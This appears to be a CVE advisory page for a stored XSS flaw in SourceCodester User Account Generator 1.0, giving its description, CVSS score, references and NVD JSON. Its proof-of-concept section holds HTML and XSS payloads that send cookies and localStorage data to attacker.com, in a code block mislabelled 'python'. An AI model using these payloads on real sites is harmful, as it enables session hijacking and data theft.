CVE-2025-63714

Description

Cross-Site Scripting (XSS) vulnerability in SourceCodester User Account Generator 1.0 allows remote attackers to execute arbitrary JavaScript code in the context of the user's browser session via crafted input in the Username Prefix field. The vulnerability exists due to improper sanitization of user-supplied input when rendering generated account data to the DOM, allowing persistent injection of malicious HTML elements that execute when clicked by users.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:remyandrade:modern_user_account_generator:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester User Account Generator 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-63714 PoC - Stored XSS in Username Prefix -->
<html>
<body>
<h2>CVE-2025-63714 PoC</h2>
<form action="http://target.com/generate_account" method="POST">
  <input type="hidden" name="username_prefix" value="<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>">
  <input type="hidden" name="generate" value="1">
  <input type="submit" value="Exploit">
</form>

<!-- Alternative XSS payloads -->
<!-- <img src=x onerror="fetch('https://attacker.com/log?data='+localStorage.getItem('*'))"> -->
<!-- <svg/onload=fetch('https://attacker.com/capture?c='+btoa(document.cookie))> -->
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63714
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63714
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63714/
[4] VulDB https://vuldb.com/cve/CVE-2025-63714
[5] https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63714/README10.md
[6] https://www.sourcecodester.com/javascript/18430/modern-user-account-generator-using-html-css-and-javascript-source-code.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63714", "sourceIdentifier": "[email protected]", "published": "2025-11-07T18:15:36.503", "lastModified": "2025-11-17T19:02:23.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) vulnerability in SourceCodester User Account Generator 1.0 allows remote attackers to execute arbitrary JavaScript code in the context of the user's browser session via crafted input in the Username Prefix field. The vulnerability exists due to improper sanitization of user-supplied input when rendering generated account data to the DOM, allowing persistent injection of malicious HTML elements that execute when clicked by users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:modern_user_account_generator:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4858668C-57A9-4859-9738-896B6E7FD545"}]}]}], "references": [{"url": "https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63714/README10.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/javascript/18430/modern-user-account-generator-using-html-css-and-javascript-source-code.html", "source": "[email protected]", "tags": ["Product"]}]}}